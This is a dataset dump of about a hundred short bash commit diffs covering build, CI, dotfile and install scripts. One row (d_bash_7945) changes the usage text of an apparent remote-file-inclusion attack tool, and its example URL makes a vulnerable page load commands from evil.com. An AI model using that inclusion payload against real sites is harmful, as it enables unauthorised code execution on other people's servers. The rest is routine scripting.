document_id
stringlengths
8
12
document
stringlengths
50
3.21k
split
stringclasses
1 value
d_bash_7900
--- +++ @@ -5,6 +5,6 @@ rm -rf ser$i mkdir -p ser$i cd ./ser$i - ../salamandre-daemon -s `expr 20000 + $i` -g `expr 20000 + $i + 1` &> log.txt & + ../salamandre-daemon -s `expr 20000 + $i` -g `expr 20000 + $i + 1` -d cd .. done
bash
d_bash_7901
--- +++ @@ -2,11 +2,6 @@ galaxy_dir=$1 current_dir=$PWD - -# Pull galaxy code -cd $galaxy_dir -git pull -cd $current_dir # Prepary galaxy tools which are in git submodules ./src/prepare_git_submodules.sh
bash
d_bash_7902
--- +++ @@ -15,9 +15,9 @@ { _dockerize $tag centos-6.7 _dockerize $tag ubuntu-16.04 + docker images -q --filter "dangling=true" | xargs docker rmi } else echo "image already pulled." fi #Cleanup dangling images -docker images -q --filter "dangling=true" | xargs docker rmi
bash
d_bash_7903
--- +++ @@ -1,4 +1,8 @@ #!/bin/bash -cd /home/pi/Code/mars/src -./rover.py | tee /var/log/mars/output.log +dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +logDir=/var/log/mars + +mkdir -p $logDir + +$dir/../src/main/python/rover.py | tee $logDir/output.log
bash
d_bash_7904
--- +++ @@ -19,7 +19,7 @@ echo mysql --user=$username --password=$password --host=$hostname $dbname -cat a2billing-schema-v1.4.0.sql UPDATE-a2billing-v1.4.0-to-v1.4.1.sql | mysql --user=$username --password=$password --host=$hostname $dbname +cat a2billing-schema-v1.4.0.sql UPDATE-a2billing-v1.4.0-to-v1.4.1.sql ...
bash
d_bash_7905
--- +++ @@ -1,4 +1,4 @@ # Setting up virtualenv export WORKON_HOME=~/.virtualpy -export VIRTUALENVWRAPPER_PYTHON=`which python36` +export VIRTUALENVWRAPPER_PYTHON=`which python3` source /usr/bin/virtualenvwrapper_lazy.sh
bash
d_bash_7906
--- +++ @@ -20,7 +20,7 @@ echo Unrecognized platform \"$KERNEL $ARCH\" fi -DNAME=gr1c-${GR1C_VERSION}-$KERNEL +DNAME=gr1c-${GR1C_VERSION}-$ARCHNAME if [ -d $DNAME ]; then echo ERROR: Directory \"$DNAME\" already exists.
bash
d_bash_7907
--- +++ @@ -9,7 +9,7 @@ chown -R rabbitmq:rabbitmq /var/log/rabbitmq exitcode=0 -puppet apply --detailed-exitcodes -v /etc/puppet/modules/nailgun/examples/keystone-only.pp || exitcode=$? +puppet apply --detailed-exitcodes -v /etc/puppet/modules/nailgun/examples/rabbitmq-only.pp || exitcode=$? if [ $exitcode -ge ...
bash
d_bash_7908
--- +++ @@ -1,8 +1,6 @@ source bash-toolbox/init.sh include base.comparator.BaseComparator - -include finder.Finder include formatter.Formatter @@ -16,7 +14,7 @@ main(){ Logger logProgressMsg "validating_formatting_rules" - files=($(Finder findBySubstring sh)) + files=($(find * -type f -iname "*.sh")) ...
bash
d_bash_7909
--- +++ @@ -1,12 +1,12 @@ #!/usr/bin/env bash url="http://localhost:8357" total=0 -max=3 +max=10 while sleep 1 do total=$((total+1)) if [ $total -gt $max ]; then - echo "Timed out waiting for server to start" + echo "Timed out waiting for server to start. Run \`killall node\` and try agai...
bash
d_bash_7910
--- +++ @@ -1,11 +1,13 @@ #!/bin/sh # Remember all the stupid submodule commands for me usage() { - printf "%s fetch - fetch submodules, if you forgot to recursive clone" \ + printf "%s fetch - fetch submodules, if you forgot to recursive clone\n" \ "$0" - printf "%s update [submodule] - updat...
bash
d_bash_7911
--- +++ @@ -3,3 +3,9 @@ alias sls="npx serverless" alias https='http --default-scheme=https' alias k='kubectl' +alias clipbase64decode="clippaste | base64 -d | clipcopy" +alias clipbase64encode="clippaste | base64 | clipcopy" +alias clipjq="clippaste | jq" +alias clipjsonformat="clippaste | jq | clipcopy" + +forma...
bash
d_bash_7912
--- +++ @@ -2,7 +2,7 @@ # Run tests echo -e "\e[0;34mRunning test suite...\e[0m" cd 'test' || exit 1 -coverage run --debug config,trace --source .,../pyautoupdate -m pytest +coverage run --debug config --source .,../pyautoupdate -m pytest test_exit=$? coverage report -m coverage xml -i
bash
d_bash_7913
--- +++ @@ -23,16 +23,6 @@ echo "no /etc/rc5.d directory - startup script not copied" fi -# check if forever was installed -#echo "forever: " -#if [[ -n $(npm list -g -parseable forever) ]] -#then -# echo " ok" -#else -# echo " installing ..." -# $SUDO npm install forever -g -#fi - # installing lo...
bash
d_bash_7914
--- +++ @@ -1,7 +1,17 @@ #!/usr/bin/env bash set -euo pipefail -echo "SSH file chmod..." -chmod 600 $HOME/.ssh/id_rsa -chmod 600 $HOME/.ssh/id_rsa.pub -chmod 755 $HOME/.ssh +if [ "$CI" = "1" ]; then + echo "Skipping post_install due to CI variable set to 1" + exit 0 +fi + +if [[ -d "$HOME/.ssh" ]]; then + ...
bash
d_bash_7915
--- +++ @@ -25,8 +25,8 @@ } function cleanup_root { - ls -1d "${CONTAINERD_ROOT}/io.containerd.snapshotter.v1.${SNAPSHOT_NAME}/snapshots/*" | xargs -I{} echo "{}/fs" | xargs -I{} umount {} - rm -rf "${CONTAINERD_ROOT}/*" + ls -1d "${CONTAINERD_ROOT}/io.containerd.snapshotter.v1.${SNAPSHOT_NAME}/snapshots...
bash
d_bash_7916
--- +++ @@ -1,6 +1,6 @@ #!/bin/bash -hab pkg exec core/hab-backline mkdir -p /tmp +hab pkg exec core/hab-backline mkdir -m 1777 -p /tmp source /etc/habitat-studio/import_keys.sh source /etc/habitat-studio/environment.sh
bash
d_bash_7917
--- +++ @@ -1,5 +1,16 @@ #!/bin/sh -travis enable -travis env set DOCKER_EMAIL me@example.com -travis env set DOCKER_USERNAME myusername -travis env set DOCKER_PASSWORD secretsecret + +if [ ! -f .travis ]; then + travis enable +fi + +read -p "Enter your Docker email : " DOCKER_EMAIL +read -p "Enter your Docker u...
bash
d_bash_7918
--- +++ @@ -3,7 +3,6 @@ sudo apt-get install python2.6 python2.6-dev python3.4 python3.4-dev pip install --use-mirrors --upgrade wheel -pip install --use-mirrors --upgrade --use-wheel detox misspellings docutils "tox < 2.0" -pip install https://bitbucket.org/hpk42/detox/get/tip.zip +pip install --use-mirrors --up...
bash
d_bash_7919
--- +++ @@ -3,6 +3,13 @@ set -eu SMROOT=$(cd $(dirname $0) && cd .. && pwd) + +TESTS=tests + +if [ $# -ge 1 ] && [ -n "$1" ]; then + echo "Only testing $1" + TESTS=$* +fi if [ ! -v RPM_BUILD_ROOT ]; then echo "Activating virtual env" @@ -27,7 +34,7 @@ -c .noserc \ --with-x...
bash
d_bash_7920
--- +++ @@ -15,4 +15,5 @@ } cleanup_brew +killall caffeinate # computer can go back to sleep final_message
bash
d_bash_7921
--- +++ @@ -2,12 +2,48 @@ # sample script for signing modules evid modules rebuild by dkms -if [[ -f /root/.MOK.priv && /root/.MOK.dir ]] +{ +/usr/bin/zenity --info --height=100 --width=400 --text \ +"The next dialog will ask you to select a key for signing the newly built EVDI modules. + +This must be the priv...
bash
d_bash_7922
--- +++ @@ -4,7 +4,9 @@ # # If GO_GB_RESTORE environment is not empty, request that gb restore the vendor # directory from manifest -[ -n "${GO_GB_RESTORE}" -a -r vendor/manifest ] && gb vendor restore +if [ -n "${GO_GB_RESTORE}" -a -r vendor/manifest ]; then + gb vendor restore || exit $# +fi # Execute the ...
bash
d_bash_7923
--- +++ @@ -1,15 +1,6 @@ #!/bin/bash -rm -rf docs || exit 0; +git config user.name "Travis-CI" +git config user.email "travis@pascalhertleif.de" +git remote set-url origin "https://${GH_TOKEN}@${GH_REF}" > /dev/null 2>&1 -CURRENT_COMMIT=`git rev-parse HEAD` - -./bin/grock --verbose --out docs/ - -( cd docs - git ...
bash
d_bash_7924
--- +++ @@ -6,7 +6,7 @@ set -e if [ -z "$NO_MINIKUBE" ]; then - pgrep -qf "[m]inikube" || minikube start --kubernetes-version="v1.14.2" --extra-config=apiserver.v=4 || { echo 'Cannot start minikube.'; exit 1; } + pgrep -f "[m]inikube" >/dev/null || minikube start --kubernetes-version="v1.14.2" --extra-config=ap...
bash
d_bash_7925
--- +++ @@ -10,5 +10,5 @@ SOURCE="$backuproot/"; DEST=$s3_plain_path -$S3CMD sync $SOURCE $DEST +$S3CMD sync --delete-removed $SOURCE $DEST
bash
d_bash_7926
--- +++ @@ -6,8 +6,8 @@ echo "rc.update_bogons.sh is starting up." | logger -# Grab a random value -value=`od -A n -d -N2 /dev/random | awk '{print int(($1/65536)*8000)}'` +# Grab a random value +value=`od -A n -d -N2 /dev/random | awk '{ print $1 }' echo "rc.update_bogons.sh is sleeping for $value" | logg...
bash
d_bash_7927
--- +++ @@ -5,4 +5,5 @@ (cd example/public && bower install) (cd example/ && gulp all) tsc -p example +(cd example/ && gulp built_csComp.d.ts) tsc -p test
bash
d_bash_7928
--- +++ @@ -13,5 +13,5 @@ echo "Running Android test..." ./setup_tests.sh -./gradlew test +./gradlew testOnlineRelease ./teardown_tests.sh
bash
d_bash_7929
--- +++ @@ -4,7 +4,14 @@ # Run tests. cd tests && phpunit --configuration phpunit.xml -# Prohibit tab characters in php files. +# Enforce line ending consistency in php files. +crlf_file=$(find . -type "f" -iname "*.php" -exec grep --files-with-matches $'\r' {} \;) +if [[ ! -z "${crlf_file}" ]]; then + echo "$...
bash
d_bash_7930
--- +++ @@ -2,7 +2,6 @@ # # Integartion testing with dockerized Postgres servers # -# Boot2Docker is deprecated and no longer supported. # Requires Docker for Mac to run on OSX. # Install: https://docs.docker.com/engine/installation/mac/ #
bash
d_bash_7931
--- +++ @@ -10,7 +10,7 @@ brew update && brew outdated brew upgrade && brew cleanup cat brew_cask_list | xargs brew cask install -brew cask outdated -q | xargs brew cask reinstall +brew cask outdated --quiet | xargs brew cask reinstall # Setup Oh-My-ZSH sh -c "$(curl -fsSL https://raw.github.com/robbyrussell/o...
bash
d_bash_7932
--- +++ @@ -8,7 +8,10 @@ /etc/init.d/virtualbox-ose-guest-utils stop fi - rmmod vboxguest + if lsmod | grep -q vboxguest; then + rmmod vboxguest + fi + aptitude -y purge virtualbox-ose-guest-x11 virtualbox-ose-guest-dkms virtualbox-ose-guest-utils aptitude -y install dkms
bash
d_bash_7933
--- +++ @@ -1,11 +1,13 @@ #!/bin/bash + +set -e IMG=raspbian-ua-netinst-`date +%Y%m%d`-git`git rev-parse --short @{0}`.img rm -f $IMG rm -f $IMG.xz -dd if=/dev/zero of=$IMG bs=1M count=32 || exit +dd if=/dev/zero of=$IMG bs=1M count=32 fdisk $IMG <<EOF n @@ -30,23 +32,23 @@ if [ $losetup_lt_2_22 ] ; ...
bash
d_bash_7934
--- +++ @@ -7,11 +7,11 @@ cd python # Run unit tests -cd biotool -python biotool_test -v || { - echo "'python -m unittest -v biotool' failed" - let errors+=1 -} +#cd biotool +#python biotool_test -v || { +# echo "'python biotool_test.py -v' failed" +# let errors+=1 +#} cd $TOP_DIR # Check program ...
bash
d_bash_7935
--- +++ @@ -1,14 +1,14 @@ #!/bin/sh -# Under atomic, we need to make sure the 'docker' group exists in +# Under atomic, we need to make sure the 'dockerroot' group exists in # /etc/group (because /lib/group cannot be modified by usermod). -echo "making 'docker' group editable" -if ! grep -q docker /etc/group; th...
bash
d_bash_7936
--- +++ @@ -5,7 +5,7 @@ fi [ ! -e static-analysis ] && mkdir static-analysis cd static-analysis -if scan-build --status-bugs cmake .. -DCMAKE_BUILD_TYPE=Debug; then +if scan-build --status-bugs cmake ..; then # This has to be done with else because with '!' it won't work on Mac OS X echo else
bash
d_bash_7937
--- +++ @@ -1,5 +1,5 @@ #!/usr/bin/env bash -set -ex +set -e echo "Starting nginx .. " nginx -p `pwd` -c static_server/nginx.conf
bash
d_bash_7938
--- +++ @@ -20,9 +20,6 @@ # React Storybook npm install -g @storybook/cli - -# Now -npm install -g now # Release npm install -g release
bash
d_bash_7939
--- +++ @@ -10,6 +10,11 @@ # pytest installed by default -- make sure we get latest pip install --upgrade pytest +# IPython stopped supporting Python 2.7 with version 6 +if [[ "$TRAVIS_PYTHON_VERSION" == "2.7" ]]; then + pip install "ipython<6" +fi + # Pandas stopped supporting Python 3.4 with version 0.21 i...
bash
d_bash_7940
--- +++ @@ -16,10 +16,6 @@ # # Note that some shares on '/mnt/' are Azure Files mounted via CIFS/Samba and # don't support standard Unix permissions. - -# Enable the script to run at reboot. -# > sudo chown root:root /usr/local/etc/reboot.sh -# > sudo chmod 755 /usr/local/reboot.sh # # Now enable this in crontab...
bash
d_bash_7941
--- +++ @@ -1,2 +1,7 @@ #!/bin/bash source jenkins-bootstrap-shared/jenkins_bootstrap.sh + +create_view --view-name 'Status Overview' --xml-data ./configs/view_status_overview.xml +create_view --view-name 'Maintenance' --xml-data ./configs/view_maintenance.xml +create_view --view-name 'Build Pipelines' --xml-data ....
bash
d_bash_7942
--- +++ @@ -9,7 +9,7 @@ $MAKE docker-push DOCKER_REGISTRY=quay.io/ if [ -n "$TRAVIS_TAG" ]; then - $MAKE docker-push-version DOCKER_REGISTRY=quay.io/ + $MAKE docker-push-version DOCKER_REGISTRY=quay.io/ PUSH_DOCKER_TAG="$TRAVIS_TAG" else - $MAKE docker-push-version DOCKER_REGISTRY=quay.io/ PUSH_DOCKER_T...
bash
d_bash_7943
--- +++ @@ -5,6 +5,9 @@ if [ ! -d "$BACKUP" ]; then mkdir $HOME/$BACKUP fi + +# Clean out the tangerine DB of any existing assessments or results +curl -H "Content-Type: application/json" -X DELETE http://mvm:mvm@localhost:5984/tangerine; curl -H "Content-Type: application/json" -X PUT http://mvm:mvm@localhost:598...
bash
d_bash_7944
--- +++ @@ -1,15 +1,10 @@ -#!/usr/bin/env bash +#!/bin/sh -#################################### +################################################################################ # git-setup.sh # -# This script sets up some basic git -# configuration. -#################################### - -echo "" -echo "Configu...
bash
d_bash_7945
--- +++ @@ -5,8 +5,8 @@ } function usage { - echo "usage: $0 [-f cmd.txt] -u URL" - echo "eg : $0 -f /var/www/hack.txt -u \"http://vulnsite.com/test.php?page=http://evil.com/cmd.txt\"" + echo "usage: $0 -f cmd.txt -u URL [-c \"curl-options\"]" + echo "eg : $0 -f /var/www/hack.txt -u \"https://vulnsite.com/t...
bash
d_bash_7946
--- +++ @@ -7,6 +7,8 @@ set -x RELEASE_VERSION=`ruby scripts/get-release-version.rb` + +echo "$RELEASE_VERSION" > version mvn org.codehaus.mojo:versions-maven-plugin:1.3.1:set \ --batch-mode \
bash
d_bash_7947
--- +++ @@ -21,6 +21,7 @@ #cp dist/jil-test-signed/test* $TMP_DIR cp dist/unsigned/test* $TMP_DIR +cp dist/unsigned/util* $TMP_DIR cp ReleaseNotes.txt $TMP_DIR cp all-tests.xls $TMP_DIR cp -R src/test-audio $TMP_DIR/
bash
d_bash_7948
--- +++ @@ -11,6 +11,7 @@ 915542151 # Monity 935250717 # MonthlyCal 928871589 # Noizio + 411466132 # Novabench 409201541 # Pages 407963104 # Pixelmator 921553264 # Screenium 3
bash
d_bash_7949
--- +++ @@ -1,6 +1,8 @@ #!/bin/sh -e cd `dirname "$0"` cd .. + +rm -Rf doc/api echo "Running doxygen" doxygen
bash
d_bash_7950
--- +++ @@ -9,5 +9,5 @@ export VISUAL="$EDITOR" alias q="$EDITOR" -alias qv="q $DOTFILES/link/.{,g}vimrc +'cd $DOTFILES/link'" +alias qv="q $DOTFILES/link/.{,g}vimrc +'cd $DOTFILES'" alias qs="q +'cd $DOTFILES'"
bash
d_bash_7951
--- +++ @@ -27,8 +27,8 @@ ./configure && make && make install cd .. # get libsndfile 1.0.26, build and install -wget http://www.mega-nerd.com/tmp/libsndfile-1.0.26pre5.tar.gz -tar -xzf libsndfile-1.0.26pre5.tar.gz -cd libsndfile-1.0.26pre5 +wget http://www.mega-nerd.com/files/libsndfile-1.0.27.tar.gz +tar -xzf lib...
bash
d_bash_7952
--- +++ @@ -3,4 +3,9 @@ # @file Linux specific shell aliases. -alias reload="source ~/.bashrc" # Reload bash configuration +alias reload="source ~/.bashrc" # Reload bash configuration + +if command -v xclip >/dev/null 2>&1; then + alias pbcopy="xclip -selection clipboard" # Copy to clipbo...
bash
d_bash_7953
--- +++ @@ -1,7 +1,3 @@ -# For Node/NPM -[[ -d /usr/local/lib/node ]] && export NODE_PATH=/usr/local/lib/node -[[ -d /usr/local/share/npm/bin ]] && export PATH=/usr/local/share/npm/bin:$PATH - # For MacTeX [[ -d /Library/TeX/texbin ]] && export PATH=$PATH:/Library/TeX/texbin
bash
d_bash_7954
--- +++ @@ -9,6 +9,12 @@ # Aliases # +export KOPS_STATE_STORE=s3://clusters.ops.butter.ai + alias kcs='kubectl --context=stage' alias kcp='kubectl --context=prod' alias kco='kubectl --context=ops' + +alias bdev='kops export kubecfg butterdevtest.ops.butter.ai' +alias bstage='kops export kubecfg butterstage.ops...
bash
d_bash_7955
--- +++ @@ -22,9 +22,10 @@ mv deal.II/doc deal.II/examples . cd deal.II -mkdir doc mkdir doxygen +mkdir doc cd doc touch Makefile.in +mkdir doxygen cd doxygen touch Makefile.in options.dox.in options.136.in header.html.in header.136.in header.tex.in cd ../../..
bash
d_bash_7956
--- +++ @@ -9,8 +9,6 @@ outdir='build_artefacts' rm -rf $outdir mkdir -p $outdir -rm -f debug.log -rm -f test.sqlite3.db echo "started build script $0 in `$outdir` at `date`" @@ -25,7 +23,4 @@ spec_rc=$? set -e -cp debug.log $outdir/ -cp test.sqlite3.db $outdir/ - exit $spec_rc
bash
d_bash_7957
--- +++ @@ -8,11 +8,11 @@ # Get PR number from CI_BUILD_REF_NAME issue=$(echo ${CI_BUILD_REF_NAME} | perl -ne '/^pr-(\d+)-\S+$/ && print $1') # Get the user name from the PR comments with the wanted magic incantation casted -user=$(curl ${CURL_ARGS} "https://api.github.com/repos/kubernetes-incubator/kubespray/issu...
bash
d_bash_7958
--- +++ @@ -20,7 +20,7 @@ # Code Coverage report (Cobertura) (handled by jenkins) # TODO OP configure where .gcna files are stored from CMake and Lib name -gcovr -x -r test/CMakeFiles/MyLib_GTest.dir/mylib -f MyLib > ${REPORTS_DIR}/gcov-report.xml || exit $? +gcovr -x -r test/CMakeFiles/MyLib_GTest.dir/mylib -f $...
bash
d_bash_7959
--- +++ @@ -6,7 +6,8 @@ tee $CONFIG_FILE > /dev/null <<EOF let Config = { VERSION: '$BUDDYBUILD_BUILD_NUMBER', - BRANCH: '$BUDDYBUILD_BRANCH' + BRANCH: '$BUDDYBUILD_BRANCH', + API_PREFIX: 'https://app.xp2017.org/api/' }; export default Config;
bash
d_bash_7960
--- +++ @@ -37,8 +37,8 @@ popd else pushd $defsdir - local=$(git rev-parse @) - remote=$(git rev-parse "@{u}") + local=$(git rev-parse HEAD) + remote=$(git rev-parse "@{upstream}") git fetch if [[ $local != $remote ]]; then git pull
bash
d_bash_7961
--- +++ @@ -1,6 +1,6 @@ #!/usr/bin/env bash -if [[ $TAG = "nightly" ]]; then +if [[ $TAG = "nightly" || $TAG =~ ^[0-9]+\.[0-9]+\.[0-9]+ ]]; then ./build-scripts/deploy-github.js else echo "Skipping deploy, not a release build..."
bash
d_bash_7962
--- +++ @@ -1,14 +1,19 @@ #!/bin/bash color=$1 +user=$2 + +if [ -z ${user} ]; then + user=${USER} +fi if [ -z ${color} ]; then - echo "Usage: $0 <color of board to flash>" + echo "Usage: $0 <color of board to flash> [<username>]" exit 1 fi key="$(cat ~/.ssh/id_rsa.pub)" arch="arm" -sed "s|<color>|${...
bash
d_bash_7963
--- +++ @@ -1,7 +1,7 @@ #!/bin/bash set -exou pipefail -rm -rf ${PWD}/.aptomi-install-cache +rm -rf "${PWD}/.aptomi-install-cache" function test_install { os="$1" @@ -10,8 +10,8 @@ docker run --rm \ -e DEBUG=yes \ -p 27866:27866 \ - -v ${PW...
bash
d_bash_7964
--- +++ @@ -1,4 +1,4 @@ -rm ./build/* +rm -r ./build/* grunt find ./build/ -type f -exec gzip "{}" \; -exec mv "{}.gz" "{}" \; -aws s3 sync ./build/ s3://fucking-eu-cookies/ --exclude ".gitignore" --cache-control "public, max-age=31536000" --content-encoding gzip --delete +aws s3 sync ./build/ s3://fucking-eu-cooki...
bash
d_bash_7965
--- +++ @@ -1,6 +1,7 @@ #!/bin/bash -x +vagrant destroy -f +vagrant up +vagrant halt mv -f package.box package.box.old -vagrant pristine -f -vagrant halt vagrant package vagrant box remove my-box
bash
d_bash_7966
--- +++ @@ -26,5 +26,5 @@ git tag "${TAG}" git push origin master "${TAG}" rm -rf ./build ./dist -python3 -m pep517.build -bs . +python -m build --sdist --wheel . twine upload ./dist/*.whl dist/*.tar.gz
bash
d_bash_7967
--- +++ @@ -5,6 +5,7 @@ # Create the database mysql -e 'create database midgard2_test;' +sudo mysql -e 'SET GLOBAL sql_mode="";' # Install Midgard2 ./app/tests/travis_midgard_install.sh
bash
d_bash_7968
--- +++ @@ -21,9 +21,6 @@ PATH="$HOME/bin:$PATH" fi -# fix superfast mouse -xinput --set-prop "pointer:Logitech USB Receiver" "Device Accel Velocity Scaling" 3 > /dev/null 2>&1 - # Add RVM to PATH for scripting. Make sure this is the last PATH variable change. export PATH="$PATH:$HOME/.rvm/bin"
bash
d_bash_7969
--- +++ @@ -1,19 +1,21 @@ #!/bin/bash -BLOCK_SIZE=6x6 -QUALITY=-thorough +GOOD=astcenc-good.exe +BAD=astcenc-avx2.exe +BLOCK_SIZE=4x4 +QUALITY=-fastest -./astcenc/astcenc-avx2-good -tl in.png out-good.png ${BLOCK_SIZE} ${QUALITY} -silent +./astcenc/${GOOD} -tl in.png out-good.png ${BLOCK_SIZE} ${QUALITY} -silent...
bash
d_bash_7970
--- +++ @@ -1,14 +1,14 @@ #!/bin/bash ACTION_NAME="import" -ACTION_VERSION="2014-12-24" +ACTION_VERSION="2015-01-05" import() { PASWORD="" if [ ! -z ${DB_LOCAL_PASS+x} ] then - PASSWORD="${PASSWORD}" + PASSWORD="-p${PASSWORD}" fi log "Importing file \e[37;44m${FILE_TO...
bash
d_bash_7971
--- +++ @@ -22,7 +22,7 @@ if [ -e "$1" ] then T=$(mktemp) && - rhino $JSB/beautify-cl.js -i 2 -a -b -n -p -d $JSB $1 > $T && + rhino $JSB/beautify-cl.js -i 2 -a -n -p -d $JSB $1 > $T && echo '/* -*- mode: espresso; espresso-indent-level: 2; indent-tabs-mode: nil -*- */ /* vim: set ...
bash
d_bash_7972
--- +++ @@ -21,6 +21,7 @@ for _sublime_path in $_sublime_darwin_paths; do if [[ -a $_sublime_path ]]; then alias st="'$_sublime_path'" + break fi done fi
bash
d_bash_7973
--- +++ @@ -3,4 +3,6 @@ l() { ls summaries/ ; } c() { perl collect.pl ; } t() { tail -1 SUMMARY.txt ; } -f1() { perl -lane '/([US])/ && print$1'; } +f1() { perl -lane '/([US])/ && print $1'; } +f2() { perl -lane '$F[1] eq $ENV{V} and print $F[2]'; } +report() { local w="$1" ; shift; (export V="$w" ; paste <(f2 < S...
bash
d_bash_7974
--- +++ @@ -4,6 +4,9 @@ antibody bundle zsh-users/zsh-completions antibody bundle robbyrussell/oh-my-zsh path:lib antibody bundle robbyrussell/oh-my-zsh path:themes/robbyrussell.zsh-theme + +# editor +export EDITOR='code --wait' # fasd if ! (which fasd > /dev/null); then
bash
d_bash_7975
--- +++ @@ -1,4 +1,4 @@ #!/bin/sh set -e -xctool -workspace ARIS.xcworkspace -scheme 'ARIS' build test +xctool -workspace ARIS.xcworkspace -sdk 'iphonesimulator' -scheme 'ARIS' -configuration 'Debug' build test
bash
d_bash_7976
--- +++ @@ -5,20 +5,45 @@ # sometimes, directly copied folder cause some wierd issues # this fixes that +echo "=> Copying the app" cp -R /app $COPIED_APP_PATH cd $COPIED_APP_PATH +echo "=> Executing NPM install --production" meteor npm install --production +echo "=> Executing Meteor Build..." meteor build...
bash
d_bash_7977
--- +++ @@ -20,6 +20,9 @@ tar xf "NvimServer.tar.bz2" popd >/dev/null + cp -r "${nvimserver_dir_path}/NvimServer" NvimView/Sources/NvimView/ + cp -r "${nvimserver_dir_path}/runtime" NvimView/Sources/NvimView/ + echo "### Downloaded NvimServer" }
bash
d_bash_7978
--- +++ @@ -21,5 +21,5 @@ -Dfile.encoding=UTF8 \ -Dsbt.global.base=$sbtHome \ -Dsbt.log.noformat=true \ - -no-colors -batch \ + -no-colors $([[ "$@" != *-no-batch* ]] && echo "-batch") \ "$@"
bash
d_bash_7979
--- +++ @@ -14,7 +14,7 @@ for PYBIN in /opt/python/*/bin; do - if [[ $PYBIN == *"36"* ]] || [[ $PYBIN == *"37"* ]] || [[ $PYBIN == *"38"* ]]; then + if [[ $PYBIN == *"36"* ]] || [[ $PYBIN == *"37"* ]] || [[ $PYBIN == *"38"* ]] || [[ $PYBIN == *"39"* ]]; then "${PYBIN}/pip" install -r /io/dev-requi...
bash
d_bash_7980
--- +++ @@ -8,6 +8,7 @@ libapache2-mod-fastcgi \ php5-dev \ php5-mysql \ +php5-curl \ locales \ gettext \ autoconf \
bash
d_bash_7981
--- +++ @@ -9,6 +9,9 @@ brew cask install --appdir="/Applications" transmission brew cask install --appdir="/Applications" gitup brew cask install --appdir="/Applications" gpg-suite-beta + brew cask install --appdir="/Applications" tunnelblick + brew cask install --appdir="/Applications" nordvpn ...
bash
d_bash_7982
--- +++ @@ -36,7 +36,9 @@ cd ../.. git clone https://github.com/surli/maven-surefire.git -cd maven-surefire/surefire-report-parser +cd maven-surefire +git checkout surefire-parser-feature-error-status +cd surefire-report-parser mvn clean install
bash
d_bash_7983
--- +++ @@ -1,4 +1,11 @@ #!/bin/bash + +# function not available on some systems +if ! which realpath 2>/dev/null; then + function realpath() { + [[ $1 = /* ]] && echo "$1" || echo "$PWD/${1#./}" + } +fi set -e
bash
d_bash_7984
--- +++ @@ -1,6 +1,7 @@ #!/bin/sh rm PAPI_FAQ.html rm release_procedure.txt +rm gitlog2changelog.py rm doc/DataRange.html rm doc/PAPI-C.html rm doc/README
bash
d_bash_7985
--- +++ @@ -2,6 +2,13 @@ git config --global user.email "dev@fetlife.com" git config --global user.name "FetBot" + +CHANGED_LOCALES=`git log -m -1 --name-only --pretty="format:" "$CIRCLE_SHA1" | grep locales` + +if [ -z "$CHANGED_LOCALES" ]; then + echo "No locale files have been changed. No need to deploy anyth...
bash
d_bash_7986
--- +++ @@ -9,12 +9,9 @@ # \curl -sSL https://raw.githubusercontent.com/codeship/scripts/master/languages/go.sh | bash -s GO_VERSION=${GO_VERSION:="1.4.2"} - # check required parameters -GOROOT=${GOROOT:?'You need to configure the GOROOT environment variable! Please set it to "/tmp/go"'} -if [ ! $(echo $PATH | g...
bash
d_bash_7987
--- +++ @@ -14,6 +14,7 @@ brew install automake # Tool for generating GNU compliant Makefiles brew install coreutils # File, shell and text manipulation utilities brew install cowsay +brew install cdiff # For side by side diffs, use with a -s brew install diff-so-fancy brew install erlang brew ins...
bash
d_bash_7988
--- +++ @@ -7,5 +7,5 @@ fi unset JENV_OPTIONS fi - JENV_OPTIONS="$JENV_OPTIONS -java-home=$JAVA_HOME" + JENV_OPTIONS="$JENV_OPTIONS -java-home $JAVA_HOME" fi
bash
d_bash_7989
--- +++ @@ -1,4 +1,15 @@ #!/usr/bin/env bash +set -o nounset +set -o errexit + +if [ "$#" -ne 2 ]; then + echo 'Usage: ./stack-init.sh <bucket_name> <stack_prefix>' + exit 1 +fi + +bucket_name=$1 +stack_prefix=$2 +PATH=$PATH:/opt/puppetlabs/bin echo "Initialising AEM Stack Builder provisioning..." @@ -6,3 +17...
bash
d_bash_7990
--- +++ @@ -1,2 +1,10 @@ #!/bin/bash +sudo apt-get install build-essential +sudo apt-get build-dep emacs24 +wget http://ftp.gnu.org/gnu/emacs/emacs-24.5.tar.gz +tar xf emacs-24.5.tar.gz +cd emacs-24.5/ +./configure +make +sudo make install git clone https://github.com/syl20bnr/spacemacs ~/.emacs.d
bash
d_bash_7991
--- +++ @@ -8,7 +8,7 @@ # Exit with nonzero exit code if anything fails set -e -@echo 'Uploading documentation to the gh-pages branch...' +echo 'Uploading documentation to the gh-pages branch...' # Checkout and clean out the docs folder git clone -b gh-pages "${REPO_PATH}" --single-branch @@ -29,8 +29,8 @@ ...
bash
d_bash_7992
--- +++ @@ -1,8 +1,8 @@ #!/bin/bash wget https://cli-assets.heroku.com/branches/stable/heroku-linux-amd64.tar.gz -mkdir -p /usr/local/lib /usr/local/bin -tar -xvzf heroku-linux-amd64.tar.gz -C /usr/local/lib -ln -s /usr/local/lib/heroku/bin/heroku /usr/local/bin/heroku +sudo mkdir -p /usr/local/lib /usr/local/bin +...
bash
d_bash_7993
--- +++ @@ -5,7 +5,7 @@ sudo gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add - sudo apt-get update -sudo apt-get -y install tor deb.torproject.org-keyring vim curl tor-arm +sudo apt-get -y --force-yes install tor deb.torproject.org-keyring vim curl tor-arm sudo /etc/init.d/tor stop
bash
d_bash_7994
--- +++ @@ -2,6 +2,7 @@ # Build file to zip all the necessary files. # start fresh +rm -f scicalc.xpi rm -rf build mkdir ./build
bash
d_bash_7995
--- +++ @@ -6,16 +6,18 @@ source $DIR/../common.sh if [ $(command -v apt-get) ]; then - DEPS="git tmux curl wget vim-nox irssi exuberant-ctags pandoc" + DEPS="git tmux curl wget vim-nox irssi exuberant-ctags pandoc golang mercurial" sudo apt-get install $DEPS fi if [ $(command -v yum) ]; then + e_warn "...
bash
d_bash_7996
--- +++ @@ -7,7 +7,7 @@ cd mapserver-6.4.1 mkdir build cd build -cmake -DWITH_KML=1 -DWITH_PHP=1 -DWITH_FCGI=0 .. +cmake -DWITH_KML=1 -DWITH_PHP=1 -DWITH_FCGI=0 -DWITH_SVGCAIRO=1 .. make sudo make install cd ../../
bash
d_bash_7997
